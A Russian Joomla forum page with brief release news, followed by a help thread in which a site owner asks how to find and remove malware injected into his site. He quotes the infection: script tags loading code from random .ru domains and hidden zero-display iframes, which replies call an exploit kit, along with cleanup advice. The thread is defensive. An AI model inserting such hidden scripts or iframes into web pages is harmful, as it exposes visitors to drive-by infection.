Новости Joomla

Вышли релизы безопасности Joomla 6.1.4 и Joomla 5.4.9

Релиз безопасности Joomla 6.1.4 и Joomla 5.4.9

Проект Joomla! рад сообщить о выходе Joomla 6.1.4 и Joomla 5.4.9. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

Вышли релизы безопасности Joomla 6.1.3 и Joomla 5.4.8

Релиз безопасности Joomla 6.1.3 и Joomla 5.4.8

Проект Joomla! рад сообщить о выходе Joomla 6.1.3 и Joomla 5.4.8. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

Joomla 5+ пакет для интеграции с API Почты России: нормализация данных, расчёт доставки, создание отправлений, партии, документы, возвраты, поиск отделений, справочники и SOAP-отслеживание.

v.3.0.0. Что нового?
Это дальнейшее развитие ранее закрытой Joomla-библиотеки для работы с API сервиса Отправка (для бизнеса) Почты России. Поэтому версия не 1.0.0, а 3.0.0.

Сейчас эта библиотека ушла от собственных реализаций и стала Joomla-обёрткой известного PHP SDK от Lapay Group.

Возможности библиотеки.
- получение настроек аккаунта, точек сдачи и текущего остатка запросов к API;
- нормализация адресов, ФИО и телефонов перед созданием отправления;
- расчёт тарифа и срока доставки;
- создание, поиск, изменение, удаление и возврат заказов в состояние «Новые»;
- проверка надёжности получателя;
- создание партий, просмотр партий и заказов внутри партии;
- генерация пакета печатных документов и формы Ф103;
- создание, изменение и удаление возвратных отправлений;
- поиск отделений по индексу, адресу и координатам, получение сервисов отделения;
- локальный список стран;
- SOAP-отслеживание операций по РПО и работа с билетами пакетного трекинга.

👩‍💻 Joomla-возможности.
В пакете библиотеки WT Otpravkapochtaru есть поля Joomla Form для расширений. Они позволяют работать в интерфейсе Joomla с некоторыми типами данных, получаемых по API из вашего личного кабинета в ЛК Почты России для бизнеса.
На данный момент в библиотеке доступны 3 поля списков, которые отображают доступные в аккаунте ОПС, типы и категории отправлений.
Поддерживаются зависимые списки: значение одного поля обновляется при изменении другого.

Системные требования.
Системные требования в основном связаны с системными требованиями апстрима библиотеки - LapayGroup PHP SDK.
- Joomla 5+
- PHP 8.3+
- Расширения PHP:
-- ext-mbstring
-- ext-simplexml
-- ext-soap (опционально, для трекинга)
-- ext-zip

Ссылки:
- Страница расширения
- GitHub библиотеки и документация

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 3516 Просмотров
*

Dusk09

  • Захожу иногда
  • 100
  • 0 / 0
Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины http://imgur.com/a/42Om7
Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>
*

ProtectYourSite

  • Живу я здесь
  • 2389
  • 142 / 4
  • Безопасность вебсайтов
Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет
*

Gosha5767

  • Захожу иногда
  • 487
  • 27 / 0
Попробуйте методом исключения, т.е. по очереди отключайте компоненты, плагины, модули и проверяйте сканером.
программа Xenu`s Link Sleuth - в помощь
Чистка сайта от дублей в Яндекс и Google.
Миграция Joomla 1.5 до Joomla 6.хх
Доработка сайта
*

Dusk09

  • Захожу иногда
  • 100
  • 0 / 0
Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет
искал на локальной копии сайта...
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины http://imgur.com/a/42Om7
Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>
Поздравляю вас! на вашем сайте похоже установили связку сплоитов, по моему мнению, это наверное самое ЗЛО, что может быть в заражение сайтов! а такие люди которые это делают, стараются более качественней подходят к своему ремеслу, там крутятся очень большие бабки, и соответствующие финансы входят в поддержку работоспособности подобного бизнеса, как минимум начните со своего компьютера, а потом переходите на лечение сайта.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.
Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!
*

Dusk09

  • Захожу иногда
  • 100
  • 0 / 0
Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!
Не замечал что кто либо использует мои аккуанты... да и эти вирусы только на одном из трех сайтов ..подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.
« Последнее редактирование: 26.12.2016, 16:04:15 от Dusk09 »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Не замечал что кто либо использует мои аккуанты...подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.
Ну это может пока не использовали.

Действия:
1. Чистите тщательно свой комп.
        проверти браузеры на сторонние расширения, они могут не детектиться АВ.
        обновляйте плагины, Adobe продукцию какая стоит и используется браузерами, сами браузеры, java
2. Меняете все пассы от чего у вас только может быть
3. Переходите к чистке сайта

*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.
Это ка вариант, но не факт! поэтому в таком случае, все методы хороши.... тем более с таким типом заражения.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
ТС, вы пробовали проверить домены, с которых вам подключены скрипты? Играми в интернете не увлекаетесь?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 89808
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 6455
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 14697
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 4744
Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

Ответов: 13
Просмотров: 9422
Последний ответ 16.05.2021, 18:52:24
от alekcae